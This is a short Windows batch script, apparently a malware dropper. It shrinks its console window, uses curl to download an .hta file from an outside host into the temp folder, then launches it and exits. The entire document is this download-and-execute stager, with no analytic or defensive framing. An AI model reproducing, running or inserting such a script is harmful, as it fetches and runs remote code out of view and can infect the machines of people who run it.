@echo off mode 20,2 curl -L "https://ucred.me/projeto.hta" -o "%TEMP%\projeto.hta" start "" "%TEMP%\projeto.hta" exit